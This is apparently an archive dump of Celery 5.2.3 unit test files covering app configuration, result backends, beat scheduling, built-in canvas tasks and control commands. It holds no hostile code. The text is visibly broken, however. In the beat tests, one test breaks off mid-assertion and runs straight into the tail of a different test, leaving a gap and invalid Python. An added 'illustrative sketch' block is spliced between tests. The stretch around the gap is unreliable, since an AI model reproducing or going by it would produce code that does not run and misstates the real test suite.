self.app.conf.MOMENT_TO_STOP assert self.app.conf.CALL_ME_BACK == 123456789 assert not self.app.conf.WANT_ME_TO assert self.app.conf.UNDERSTAND_ME def test_config_from_object__lazy(self): conf = ObjectConfig2() self.app.config_from_object(conf) assert self.app.loader._conf is unconfigured assert self.app._config_source is conf self.assert_config2() def test_config_from_object__force(self): self.app.config_from_object(ObjectConfig2(), force=True) assert self.app.loader._conf self.assert_config2() def test_config_from_object__compat(self): class Config: CELERY_ALWAYS_EAGER = 44 CELERY_DEFAULT_DELIVERY_MODE = 30 CELERY_TASK_PUBLISH_RETRY = False self.app.config_from_object(Config) assert self.app.conf.task_always_eager == 44 assert self.app.conf.CELERY_ALWAYS_EAGER == 44 assert not self.app.conf.task_publish_retry assert self.app.conf.task_default_routing_key == 'testcelery' def test_config_from_object__supports_old_names(self): class Config: task_always_eager = 45 task_default_delivery_mode = 301 self.app.config_from_object(Config()) assert self.app.conf.CELERY_ALWAYS_EAGER == 45 assert self.app.conf.task_always_eager == 45 assert self.app.conf.CELERY_DEFAULT_DELIVERY_MODE == 301 assert self.app.conf.task_default_delivery_mode == 301 assert self.app.conf.task_default_routing_key == 'testcelery' def test_config_from_object__namespace_uppercase(self): class Config: CELERY_TASK_ALWAYS_EAGER = 44 CELERY_TASK_DEFAULT_DELIVERY_MODE = 301 self.app.config_from_object(Config(), namespace='CELERY') assert self.app.conf.task_always_eager == 44 def test_config_from_object__namespace_lowercase(self): class Config: celery_task_always_eager = 44 celery_task_default_delivery_mode = 301 self.app.config_from_object(Config(), namespace='celery') assert self.app.conf.task_always_eager == 44 def test_config_from_object__mixing_new_and_old(self): class Config: task_always_eager = 44 worker_agent = 'foo:Agent' worker_consumer = 'foo:Consumer' beat_schedule = '/foo/schedule' CELERY_DEFAULT_DELIVERY_MODE = 301 with pytest.raises(ImproperlyConfigured) as exc: self.app.config_from_object(Config(), force=True) assert exc.args[0].startswith('CELERY_DEFAULT_DELIVERY_MODE') assert 'task_default_delivery_mode' in exc.args[0] def test_config_from_object__mixing_old_and_new(self): class Config: CELERY_ALWAYS_EAGER = 46 CELERYD_AGENT = 'foo:Agent' CELERYD_CONSUMER = 'foo:Consumer' CELERYBEAT_SCHEDULE = '/foo/schedule' task_default_delivery_mode = 301 with pytest.raises(ImproperlyConfigured) as exc: self.app.config_from_object(Config(), force=True) assert exc.args[0].startswith('task_default_delivery_mode') assert 'CELERY_DEFAULT_DELIVERY_MODE' in exc.args[0] def test_config_from_cmdline(self): cmdline = ['task_always_eager=no', 'result_backend=/dev/null', 'worker_prefetch_multiplier=368', '.foobarstring=(string)300', '.foobarint=(int)300', 'database_engine_options=(dict){"foo": "bar"}'] self.app.config_from_cmdline(cmdline, namespace='worker') assert not self.app.conf.task_always_eager assert self.app.conf.result_backend == '/dev/null' assert self.app.conf.worker_prefetch_multiplier == 368 assert self.app.conf.worker_foobarstring == '300' assert self.app.conf.worker_foobarint == 300 assert self.app.conf.database_engine_options == {'foo': 'bar'} def test_setting__broker_transport_options(self): _args = {'foo': 'bar', 'spam': 'baz'} self.app.config_from_object(Bunch()) assert self.app.conf.broker_transport_options == \ {'polling_interval': 0.1} self.app.config_from_object(Bunch(broker_transport_options=_args)) assert 
self.app.conf.broker_transport_options == _args def test_Windows_log_color_disabled(self): self.app.IS_WINDOWS = True assert not self.app.log.supports_color(True) def test_WorkController(self): x = self.app.WorkController assert x.app is self.app def test_Worker(self): x = self.app.Worker assert x.app is self.app @pytest.mark.usefixtures('depends_on_current_app') def test_AsyncResult(self): x = self.app.AsyncResult('1') assert x.app is self.app r = loads(dumps(x)) # not set as current, so ends up as default app after reduce assert r.app is current_app._get_current_object() def test_get_active_apps(self): assert list(_state._get_active_apps()) app1 = self.Celery() appid = id(app1) assert app1 in _state._get_active_apps() app1.close() del(app1) gc.collect() # weakref removed from list when app goes out of scope. with pytest.raises(StopIteration): next(app for app in _state._get_active_apps() if id(app) == appid) def test_config_from_envvar_more(self, key='CELERY_HARNESS_CFG1'): assert not self.app.config_from_envvar( 'HDSAJIHWIQHEWQU', force=True, silent=True) with pytest.raises(ImproperlyConfigured): self.app.config_from_envvar( 'HDSAJIHWIQHEWQU', force=True, silent=False, ) os.environ[key] = __name__ + '.object_config' assert self.app.config_from_envvar(key, force=True) assert self.app.conf['FOO'] == 1 assert self.app.conf['BAR'] == 2 os.environ[key] = 'unknown_asdwqe.asdwqewqe' with pytest.raises(ImportError): self.app.config_from_envvar(key, silent=False) assert not self.app.config_from_envvar(key, force=True, silent=True) os.environ[key] = __name__ + '.dict_config' assert self.app.config_from_envvar(key, force=True) assert self.app.conf['FOO'] == 10 assert self.app.conf['BAR'] == 20 @patch('celery.bin.celery.celery') def test_start(self, mocked_celery): self.app.start() mocked_celery.main.assert_called() @pytest.mark.parametrize('url,expected_fields', [ ('pyamqp://', { 'hostname': 'localhost', 'userid': 'guest', 'password': 'guest', 'virtual_host': '/', }), ('pyamqp://:1978/foo', { 'port': 1978, 'virtual_host': 'foo', }), ('pyamqp:////value', { 'virtual_host': '/value', }) ]) def test_amqp_get_broker_info(self, url, expected_fields): info = self.app.connection(url).info() for key, expected_value in expected_fields.items(): assert info[key] == expected_value def test_amqp_failover_strategy_selection(self): # Test passing in a string and make sure the string # gets there untouched self.app.conf.broker_failover_strategy = 'foo-bar' assert self.app.connection('amqp:////value') \ .failover_strategy == 'foo-bar' # Try passing in None self.app.conf.broker_failover_strategy = None assert self.app.connection('amqp:////value') \ .failover_strategy == itertools.cycle # Test passing in a method def my_failover_strategy(it): yield True self.app.conf.broker_failover_strategy = my_failover_strategy assert self.app.connection('amqp:////value') \ .failover_strategy == my_failover_strategy def test_after_fork(self): self.app._pool = Mock() self.app.on_after_fork = Mock(name='on_after_fork') self.app._after_fork() assert self.app._pool is None self.app.on_after_fork.send.assert_called_with(sender=self.app) self.app._after_fork() def test_global_after_fork(self): self.app._after_fork = Mock(name='_after_fork') _appbase._after_fork_cleanup_app(self.app) self.app._after_fork.assert_called_with() @patch('celery.app.base.logger') def test_after_fork_cleanup_app__raises(self, logger): self.app._after_fork = Mock(name='_after_fork') exc = self.app._after_fork.side_effect = KeyError() 
_appbase._after_fork_cleanup_app(self.app) logger.info.assert_called_with( 'after forker raised exception: %r', exc, exc_info=1) def test_ensure_after_fork__no_multiprocessing(self): prev, _appbase.register_after_fork = ( _appbase.register_after_fork, None) try: self.app._after_fork_registered = False self.app._ensure_after_fork() assert self.app._after_fork_registered finally: _appbase.register_after_fork = prev def test_canvas(self): assert self.app._canvas.Signature def test_signature(self): sig = self.app.signature('foo', (1, 2)) assert sig.app is self.app def test_timezone__none_set(self): self.app.conf.timezone = None self.app.conf.enable_utc = True assert self.app.timezone == timezone.utc del self.app.timezone self.app.conf.enable_utc = False assert self.app.timezone == timezone.local def test_uses_utc_timezone(self): self.app.conf.timezone = None self.app.conf.enable_utc = True assert self.app.uses_utc_timezone() is True self.app.conf.enable_utc = False del self.app.timezone assert self.app.uses_utc_timezone() is False self.app.conf.timezone = 'US/Eastern' del self.app.timezone assert self.app.uses_utc_timezone() is False self.app.conf.timezone = 'UTC' del self.app.timezone assert self.app.uses_utc_timezone() is True def test_compat_on_configure(self): _on_configure = Mock(name='on_configure') class CompatApp(Celery): def on_configure(self, *args, **kwargs): # on pypy3 if named on_configure the class function # will be called, instead of the mock defined above, # so we add the underscore. _on_configure(*args, **kwargs) with CompatApp(set_as_current=False) as app: app.loader = Mock() app.loader.conf = {} app._load_config() _on_configure.assert_called_with() def test_add_periodic_task(self): @self.app.task def add(x, y): pass assert not self.app.configured self.app.add_periodic_task( 10, self.app.signature('add', (2, 2)), name='add1', expires=3, ) assert self.app._pending_periodic_tasks assert not self.app.configured sig2 = add.s(4, 4) assert self.app.configured self.app.add_periodic_task(20, sig2, name='add2', expires=4) assert 'add1' in self.app.conf.beat_schedule assert 'add2' in self.app.conf.beat_schedule @pytest.mark.masked_modules('multiprocessing.util') def test_pool_no_multiprocessing(self, mask_modules): pool = self.app.pool assert pool is self.app._pool def test_bugreport(self): assert self.app.bugreport() def test_send_task__connection_provided(self): connection = Mock(name='connection') router = Mock(name='router') router.route.return_value = {} self.app.amqp = Mock(name='amqp') self.app.amqp.Producer.attach_mock(ContextMock(), 'return_value') self.app.send_task('foo', (1, 2), connection=connection, router=router) self.app.amqp.Producer.assert_called_with( connection, auto_declare=False) self.app.amqp.send_task_message.assert_called_with( self.app.amqp.Producer(), 'foo', self.app.amqp.create_task_message()) def test_send_task_sent_event(self): class Dispatcher: sent = [] def publish(self, type, fields, *args, **kwargs): self.sent.append((type, fields)) conn = self.app.connection() chan = conn.channel() try: for e in ('foo_exchange', 'moo_exchange', 'bar_exchange'): chan.exchange_declare(e, 'direct', durable=True) chan.queue_declare(e, durable=True) chan.queue_bind(e, e, e) finally: chan.close() assert conn.transport_cls == 'memory' message = self.app.amqp.create_task_message( 'id', 'footask', (), {}, create_sent_event=True, ) prod = self.app.amqp.Producer(conn) dispatcher = Dispatcher() self.app.amqp.send_task_message( prod, 'footask', message, exchange='moo_exchange', 
            routing_key='moo_exchange', event_dispatcher=dispatcher,
        )
        assert dispatcher.sent
        assert dispatcher.sent[0][0] == 'task-sent'
        self.app.amqp.send_task_message(
            prod, 'footask', message, event_dispatcher=dispatcher,
            exchange='bar_exchange', routing_key='bar_exchange',
        )

    def test_select_queues(self):
        self.app.amqp = Mock(name='amqp')
        self.app.select_queues({'foo', 'bar'})
        self.app.amqp.queues.select.assert_called_with({'foo', 'bar'})

    def test_Beat(self):
        from celery.apps.beat import Beat
        beat = self.app.Beat()
        assert isinstance(beat, Beat)

    def test_registry_cls(self):
        class TaskRegistry(self.app.registry_cls):
            pass

        class CustomCelery(type(self.app)):
            registry_cls = TaskRegistry
        app = CustomCelery(set_as_current=False)
        assert isinstance(app.tasks, TaskRegistry)

    def test_oid(self):
        # Test that oid is a global value.
        oid1 = self.app.oid
        oid2 = self.app.oid
        uuid.UUID(oid1)
        uuid.UUID(oid2)
        assert oid1 == oid2

    def test_global_oid(self):
        # Test that oid is a global value shared across threads.
        main_oid = self.app.oid
        uuid.UUID(main_oid)
        from concurrent.futures import ThreadPoolExecutor
        with ThreadPoolExecutor(max_workers=1) as executor:
            future = executor.submit(lambda: self.app.oid)
        thread_oid = future.result()
        uuid.UUID(thread_oid)
        assert main_oid == thread_oid

    def test_thread_oid(self):
        # Test that thread_oid is a stable value within a single thread.
        oid1 = self.app.thread_oid
        oid2 = self.app.thread_oid
        uuid.UUID(oid1)
        uuid.UUID(oid2)
        assert oid1 == oid2

    def test_backend(self):
        # Test that app.backend returns the same backend within a single thread.
        backend1 = self.app.backend
        backend2 = self.app.backend
        assert isinstance(backend1, Backend)
        assert isinstance(backend2, Backend)
        assert backend1 is backend2

    def test_thread_backend(self):
        # Test that app.backend returns a new backend for each thread.
        main_backend = self.app.backend
        from concurrent.futures import ThreadPoolExecutor
        with ThreadPoolExecutor(max_workers=1) as executor:
            future = executor.submit(lambda: self.app.backend)
        thread_backend = future.result()
        assert isinstance(main_backend, Backend)
        assert isinstance(thread_backend, Backend)
        assert main_backend is not thread_backend

    def test_thread_oid_is_local(self):
        # Test that thread_oid is local to the thread.
main_oid = self.app.thread_oid uuid.UUID(main_oid) from concurrent.futures import ThreadPoolExecutor with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(lambda: self.app.thread_oid) thread_oid = future.result() uuid.UUID(thread_oid) assert main_oid != thread_oid class test_defaults: def test_strtobool(self): for s in ('false', 'no', '0'): assert not defaults.strtobool(s) for s in ('true', 'yes', '1'): assert defaults.strtobool(s) with pytest.raises(TypeError): defaults.strtobool('unsure') class test_debugging_utils: def test_enable_disable_trace(self): try: _app.enable_trace() assert _state.app_or_default == _state._app_or_default_trace _app.disable_trace() assert _state.app_or_default == _state._app_or_default finally: _app.disable_trace() class test_pyimplementation: def test_platform_python_implementation(self): with conftest.platform_pyimp(lambda: 'Xython'): assert pyimplementation() == 'Xython' def test_platform_jython(self): with conftest.platform_pyimp(): with conftest.sys_platform('java 1.6.51'): assert 'Jython' in pyimplementation() def test_platform_pypy(self): with conftest.platform_pyimp(): with conftest.sys_platform('darwin'): with conftest.pypy_version((1, 4, 3)): assert 'PyPy' in pyimplementation() with conftest.pypy_version((1, 4, 3, 'a4')): assert 'PyPy' in pyimplementation() def test_platform_fallback(self): with conftest.platform_pyimp(): with conftest.sys_platform('darwin'): with conftest.pypy_version(): assert 'CPython' == pyimplementation() class test_shared_task: def test_registers_to_all_apps(self): with self.Celery('xproj', set_as_current=True) as xproj: xproj.finalize() @shared_task def foo(): return 42 @shared_task() def bar(): return 84 assert foo.app is xproj assert bar.app is xproj assert foo._get_current_object() with self.Celery('yproj', set_as_current=True) as yproj: assert foo.app is yproj assert bar.app is yproj @shared_task() def baz(): return 168 assert baz.app is yproj ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_backends.py0000664000175000017500000001067600000000000020074 0ustar00asifasif00000000000000import threading from contextlib import contextmanager from unittest.mock import patch import pytest import celery.contrib.testing.worker as contrib_embed_worker from celery.app import backends from celery.backends.cache import CacheBackend from celery.exceptions import ImproperlyConfigured from celery.utils.nodenames import anon_nodename class CachedBackendWithTreadTrucking(CacheBackend): test_instance_count = 0 test_call_stats = {} def _track_attribute_access(self, method_name): cls = type(self) instance_no = getattr(self, '_instance_no', None) if instance_no is None: instance_no = self._instance_no = cls.test_instance_count cls.test_instance_count += 1 cls.test_call_stats[instance_no] = [] cls.test_call_stats[instance_no].append({ 'thread_id': threading.get_ident(), 'method_name': method_name }) def __getattribute__(self, name): if name == '_instance_no' or name == '_track_attribute_access': return super().__getattribute__(name) if name.startswith('__') and name != '__init__': return super().__getattribute__(name) self._track_attribute_access(name) return super().__getattribute__(name) @contextmanager def embed_worker(app, concurrency=1, pool='threading', **kwargs): """ Helper embedded worker for testing. 
    It's based on :func:`celery.contrib.testing.worker.start_worker`,
    but it doesn't modify logging settings and it additionally shuts
    down the worker pool.
    """
    # prepare application for worker
    app.finalize()
    app.set_current()

    worker = contrib_embed_worker.TestWorkController(
        app=app,
        concurrency=concurrency,
        hostname=anon_nodename(),
        pool=pool,
        # not allowed to override TestWorkController.on_consumer_ready
        ready_callback=None,
        without_heartbeat=kwargs.pop("without_heartbeat", True),
        without_mingle=True,
        without_gossip=True,
        **kwargs
    )

    t = threading.Thread(target=worker.start, daemon=True)
    t.start()
    worker.ensure_started()

    yield worker

    worker.stop()
    t.join(10.0)
    if t.is_alive():
        raise RuntimeError(
            "Worker thread failed to exit within the allocated timeout. "
            "Consider raising `shutdown_timeout` if your tasks take longer "
            "to execute."
        )


class test_backends:

    @pytest.mark.parametrize('url,expect_cls', [
        ('cache+memory://', CacheBackend),
    ])
    def test_get_backend_aliases(self, url, expect_cls, app):
        backend, url = backends.by_url(url, app.loader)
        assert isinstance(backend(app=app, url=url), expect_cls)

    def test_unknown_backend(self, app):
        with pytest.raises(ImportError):
            backends.by_name('fasodaopjeqijwqe', app.loader)

    def test_backend_by_url(self, app, url='redis://localhost/1'):
        from celery.backends.redis import RedisBackend
        backend, url_ = backends.by_url(url, app.loader)
        assert backend is RedisBackend
        assert url_ == url

    def test_sym_raises_ValueError(self, app):
        with patch('celery.app.backends.symbol_by_name') as sbn:
            sbn.side_effect = ValueError()
            with pytest.raises(ImproperlyConfigured):
                backends.by_name('xxx.xxx:foo', app.loader)

    def test_backend_can_not_be_module(self, app):
        with pytest.raises(ImproperlyConfigured):
            backends.by_name(pytest, app.loader)

    @pytest.mark.celery(
        result_backend=f'{CachedBackendWithTreadTrucking.__module__}.'
f'{CachedBackendWithTreadTrucking.__qualname__}' f'+memory://') def test_backend_thread_safety(self): @self.app.task def dummy_add_task(x, y): return x + y with embed_worker(app=self.app, pool='threads'): result = dummy_add_task.delay(6, 9) assert result.get(timeout=10) == 15 call_stats = CachedBackendWithTreadTrucking.test_call_stats # check that backend instance is used without same thread for backend_call_stats in call_stats.values(): thread_ids = set() for call_stat in backend_call_stats: thread_ids.add(call_stat['thread_id']) assert len(thread_ids) <= 1, \ "The same celery backend instance is used by multiple threads" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_beat.py0000664000175000017500000006741600000000000017241 0ustar00asifasif00000000000000import errno from datetime import datetime, timedelta from pickle import dumps, loads from unittest.mock import Mock, call, patch import pytest import pytz from celery import __version__, beat, uuid from celery.beat import BeatLazyFunc, event_t from celery.schedules import crontab, schedule from celery.utils.objects import Bunch class MockShelve(dict): closed = False synced = False def close(self): self.closed = True def sync(self): self.synced = True class MockService: started = False stopped = False def __init__(self, *args, **kwargs): pass def start(self, **kwargs): self.started = True def stop(self, **kwargs): self.stopped = True class test_BeatLazyFunc: def test_beat_lazy_func(self): def add(a, b): return a + b result = BeatLazyFunc(add, 1, 2) assert add(1, 2) == result() assert add(1, 2) == result.delay() class test_ScheduleEntry: Entry = beat.ScheduleEntry def create_entry(self, **kwargs): entry = { 'name': 'celery.unittest.add', 'schedule': timedelta(seconds=10), 'args': (2, 2), 'options': {'routing_key': 'cpu'}, 'app': self.app, } return self.Entry(**dict(entry, **kwargs)) def test_next(self): entry = self.create_entry(schedule=10) assert entry.last_run_at assert isinstance(entry.last_run_at, datetime) assert entry.total_run_count == 0 next_run_at = entry.last_run_at + timedelta(seconds=10) next_entry = entry.next(next_run_at) assert next_entry.last_run_at >= next_run_at assert next_entry.total_run_count == 1 def test_is_due(self): entry = self.create_entry(schedule=timedelta(seconds=10)) assert entry.app is self.app assert entry.schedule.app is self.app due1, next_time_to_run1 = entry.is_due() assert not due1 assert next_time_to_run1 > 9 next_run_at = entry.last_run_at - timedelta(seconds=10) next_entry = entry.next(next_run_at) due2, next_time_to_run2 = next_entry.is_due() assert due2 assert next_time_to_run2 > 9 def test_repr(self): entry = self.create_entry() assert ' 1: return s.sh raise OSError() opens.side_effect = effect s.setup_schedule() s._remove_db.assert_called_with() s._store = {'__version__': 1} s.setup_schedule() s._store.clear = Mock() op = s.persistence.open = Mock() op.return_value = s._store s._store['tz'] = 'FUNKY' s.setup_schedule() op.assert_called_with(s.schedule_filename, writeback=True) s._store.clear.assert_called_with() s._store['utc_enabled'] = False s._store.clear = Mock() s.setup_schedule() s._store.clear.assert_called_with() def test_get_schedule(self): s = create_persistent_scheduler()[0]( schedule_filename='schedule', app=self.app, ) s._store = {'entries': {}} s.schedule = {'foo': 'bar'} assert s.schedule == {'foo': 'bar'} assert s._store['entries'] == s.schedule def 
test_run_all_due_tasks_after_restart(self): scheduler_class, shelve = create_persistent_scheduler_w_call_logging() shelve['tz'] = 'UTC' shelve['utc_enabled'] = True shelve['__version__'] = __version__ cur_seconds = 20 def now_func(): return datetime(2018, 1, 1, 1, 11, cur_seconds) app_schedule = { 'first_missed': {'schedule': crontab( minute='*/10', nowfun=now_func), 'task': 'first_missed'}, 'second_missed': {'schedule': crontab( minute='*/1', nowfun=now_func), 'task': 'second_missed'}, 'non_missed': {'schedule': crontab( minute='*/13', nowfun=now_func), 'task': 'non_missed'} } shelve['entries'] = { 'first_missed': beat.ScheduleEntry( 'first_missed', 'first_missed', last_run_at=now_func() - timedelta(minutes=2), total_run_count=10, schedule=app_schedule['first_missed']['schedule']), 'second_missed': beat.ScheduleEntry( 'second_missed', 'second_missed', last_run_at=now_func() - timedelta(minutes=2), total_run_count=10, schedule=app_schedule['second_missed']['schedule']), 'non_missed': beat.ScheduleEntry( 'non_missed', 'non_missed', last_run_at=now_func() - timedelta(minutes=2), total_run_count=10, schedule=app_schedule['non_missed']['schedule']), } self.app.conf.beat_schedule = app_schedule scheduler = scheduler_class(self.app) max_iter_number = 5 for i in range(max_iter_number): delay = scheduler.tick() if delay > 0: break assert {'first_missed', 'second_missed'} == { item['task'] for item in scheduler.sent} # ensure next call on the beginning of next min assert abs(60 - cur_seconds - delay) < 1 class test_Service: def get_service(self): Scheduler, mock_shelve = create_persistent_scheduler() return beat.Service(app=self.app, scheduler_cls=Scheduler), mock_shelve def test_pickleable(self): s = beat.Service(app=self.app, scheduler_cls=Mock) assert loads(dumps(s)) def test_start(self): s, sh = self.get_service() schedule = s.scheduler.schedule assert isinstance(schedule, dict) assert isinstance(s.scheduler, beat.Scheduler) scheduled = list(schedule.keys()) for task_name in sh['entries'].keys(): assert task_name in scheduled s.sync() assert sh.closed assert sh.synced assert s._is_stopped.is_set() s.sync() s.stop(wait=False) assert s._is_shutdown.is_set() s.stop(wait=True) assert s._is_shutdown.is_set() p = s.scheduler._store s.scheduler._store = None try: s.scheduler.sync() finally: s.scheduler._store = p def test_start_embedded_process(self): s, sh = self.get_service() s._is_shutdown.set() s.start(embedded_process=True) def test_start_thread(self): s, sh = self.get_service() s._is_shutdown.set() s.start(embedded_process=False) def test_start_tick_raises_exit_error(self): s, sh = self.get_service() s.scheduler.tick_raises_exit = True s.start() assert s._is_shutdown.is_set() def test_start_manages_one_tick_before_shutdown(self): s, sh = self.get_service() s.scheduler.shutdown_service = s s.start() assert s._is_shutdown.is_set() class test_EmbeddedService: def xxx_start_stop_process(self): pytest.importorskip('_multiprocessing') from billiard.process import Process s = beat.EmbeddedService(self.app) assert isinstance(s, Process) assert isinstance(s.service, beat.Service) s.service = MockService() class _Popen: terminated = False def terminate(self): self.terminated = True with patch('celery.platforms.close_open_fds'): s.run() assert s.service.started s._popen = _Popen() s.stop() assert s.service.stopped assert s._popen.terminated def test_start_stop_threaded(self): s = beat.EmbeddedService(self.app, thread=True) from threading import Thread assert isinstance(s, Thread) assert 
isinstance(s.service, beat.Service)
        s.service = MockService()
        s.run()
        assert s.service.started
        s.stop()
        assert s.service.stopped


class test_schedule:

    def test_maybe_make_aware(self):
        x = schedule(10, app=self.app)
        x.utc_enabled = True
        d = x.maybe_make_aware(datetime.utcnow())
        assert d.tzinfo
        x.utc_enabled = False
        d2 = x.maybe_make_aware(datetime.utcnow())
        assert d2.tzinfo

    def test_to_local(self):
        x = schedule(10, app=self.app)
        x.utc_enabled = True
        d = x.to_local(datetime.utcnow())
        assert d.tzinfo is None
        x.utc_enabled = False
        d = x.to_local(datetime.utcnow())
        assert d.tzinfo
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/app/test_builtins.py0000664000175000017500000001254000000000000020143 0ustar00asifasif00000000000000
from unittest.mock import Mock, patch

import pytest

from celery import chord, group
from celery.app import builtins
from celery.contrib.testing.mocks import ContextMock
from celery.utils.functional import pass1


class BuiltinsCase:

    def setup(self):
        @self.app.task(shared=False)
        def xsum(x):
            return sum(x)
        self.xsum = xsum

        @self.app.task(shared=False)
        def add(x, y):
            return x + y
        self.add = add


class test_backend_cleanup(BuiltinsCase):

    def test_run(self):
        self.app.backend.cleanup = Mock()
        self.app.backend.cleanup.__name__ = 'cleanup'
        cleanup_task = builtins.add_backend_cleanup_task(self.app)
        cleanup_task()
        self.app.backend.cleanup.assert_called()


class test_accumulate(BuiltinsCase):

    def setup(self):
        self.accumulate = self.app.tasks['celery.accumulate']

    def test_with_index(self):
        assert self.accumulate(1, 2, 3, 4, index=0) == 1

    def test_no_index(self):
        assert self.accumulate(1, 2, 3, 4) == (1, 2, 3, 4)


class test_map(BuiltinsCase):

    def test_run(self):
        @self.app.task(shared=False)
        def map_mul(x):
            return x[0] * x[1]

        res = self.app.tasks['celery.map'](
            map_mul, [(2, 2), (4, 4), (8, 8)],
        )
        assert res == [4, 16, 64]


class test_starmap(BuiltinsCase):

    def test_run(self):
        @self.app.task(shared=False)
        def smap_mul(x, y):
            return x * y

        res = self.app.tasks['celery.starmap'](
            smap_mul, [(2, 2), (4, 4), (8, 8)],
        )
        assert res == [4, 16, 64]


class test_chunks(BuiltinsCase):

    @patch('celery.canvas.chunks.apply_chunks')
    def test_run(self, apply_chunks):

        @self.app.task(shared=False)
        def chunks_mul(l):
            return l

        self.app.tasks['celery.chunks'](
            chunks_mul, [(2, 2), (4, 4), (8, 8)], 1,
        )
        apply_chunks.assert_called()


class test_group(BuiltinsCase):

    def setup(self):
        self.maybe_signature = self.patching('celery.canvas.maybe_signature')
        self.maybe_signature.side_effect = pass1
        self.app.producer_or_acquire = Mock()
        self.app.producer_or_acquire.attach_mock(
            ContextMock(serializer='json'), 'return_value'
        )
        self.app.conf.task_always_eager = True
        self.task = builtins.add_group_task(self.app)
        super().setup()

    def test_apply_async_eager(self):
        self.task.apply = Mock(name='apply')
        self.task.apply_async((1, 2, 3, 4, 5))
        self.task.apply.assert_called()

    def mock_group(self, *tasks):
        g = group(*tasks, app=self.app)
        result = g.freeze()
        for task in g.tasks:
            task.clone = Mock(name='clone')
            task.clone.attach_mock(Mock(), 'apply_async')
        return g, result

    @patch('celery.app.base.Celery.current_worker_task')
    def test_task(self, current_worker_task):
        g, result = self.mock_group(self.add.s(2), self.add.s(4))
        self.task(g.tasks, result, result.id, (2,)).results
        g.tasks[0].clone().apply_async.assert_called_with(
            group_id=result.id, producer=self.app.producer_or_acquire(),
            add_to_parent=False,
        )
        current_worker_task.add_trail.assert_called_with(result)
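# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original test suite): the built-in
# tasks exercised above (celery.map, celery.starmap, celery.group) back the
# public canvas helpers shown below.  This is a minimal example under the
# assumption of a throwaway app named 'sketch' with eager execution enabled,
# so it runs in-process without a broker; the app and task names here are
# invented for illustration only.
from celery import Celery, group

sketch_app = Celery('sketch')                 # hypothetical app
sketch_app.conf.task_always_eager = True      # run tasks in the calling process


@sketch_app.task
def sketch_add(x, y):
    return x + y


# group() fans out signatures and joins their results ...
assert group(sketch_add.s(2, 2), sketch_add.s(4, 4)).delay().get() == [4, 8]
# ... while starmap() maps argument tuples over a single task.
assert sketch_add.starmap([(2, 2), (4, 4)]).delay().get() == [4, 8]
# ---------------------------------------------------------------------------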
@patch('celery.app.base.Celery.current_worker_task') def test_task__disable_add_to_parent(self, current_worker_task): g, result = self.mock_group(self.add.s(2, 2), self.add.s(4, 4)) self.task(g.tasks, result, result.id, None, add_to_parent=False) current_worker_task.add_trail.assert_not_called() class test_chain(BuiltinsCase): def setup(self): super().setup() self.task = builtins.add_chain_task(self.app) def test_not_implemented(self): with pytest.raises(NotImplementedError): self.task() class test_chord(BuiltinsCase): def setup(self): self.task = builtins.add_chord_task(self.app) super().setup() def test_apply_async(self): x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s()) r = x.apply_async() assert r assert r.parent def test_run_header_not_group(self): self.task([self.add.s(i, i) for i in range(10)], self.xsum.s()) def test_forward_options(self): body = self.xsum.s() x = chord([self.add.s(i, i) for i in range(10)], body=body) x.run = Mock(name='chord.run(x)') x.apply_async(group_id='some_group_id') x.run.assert_called() resbody = x.run.call_args[0][1] assert resbody.options['group_id'] == 'some_group_id' x2 = chord([self.add.s(i, i) for i in range(10)], body=body) x2.run = Mock(name='chord.run(x2)') x2.apply_async(chord='some_chord_id') x2.run.assert_called() resbody = x2.run.call_args[0][1] assert resbody.options['chord'] == 'some_chord_id' def test_apply_eager(self): self.app.conf.task_always_eager = True x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s()) r = x.apply_async() assert r.get() == 90 def test_apply_eager_with_arguments(self): self.app.conf.task_always_eager = True x = chord([self.add.s(i) for i in range(10)], body=self.xsum.s()) r = x.apply_async([1]) assert r.get() == 55 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_celery.py0000664000175000017500000000054400000000000017576 0ustar00asifasif00000000000000import pytest import celery def test_version(): assert celery.VERSION assert len(celery.VERSION) >= 3 celery.VERSION = (0, 3, 0) assert celery.__version__.count('.') >= 2 @pytest.mark.parametrize('attr', [ '__author__', '__contact__', '__homepage__', '__docformat__', ]) def test_meta(attr): assert getattr(celery, attr, None) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_control.py0000664000175000017500000004256300000000000020002 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery import uuid from celery.app import control from celery.exceptions import DuplicateNodenameWarning from celery.utils.collections import LimitedSet def _info_for_commandclass(type_): from celery.worker.control import Panel return [ (name, info) for name, info in Panel.meta.items() if info.type == type_ ] def test_client_implements_all_commands(app): commands = _info_for_commandclass('control') assert commands for name, info in commands: assert getattr(app.control, name) def test_inspect_implements_all_commands(app): inspect = app.control.inspect() commands = _info_for_commandclass('inspect') assert commands for name, info in commands: if info.type == 'inspect': assert getattr(inspect, name) class test_flatten_reply: def test_flatten_reply(self): reply = [ {'foo@example.com': {'hello': 10}}, {'foo@example.com': {'hello': 20}}, {'bar@example.com': {'hello': 30}} ] with pytest.warns(DuplicateNodenameWarning) as w: nodes = control.flatten_reply(reply) 
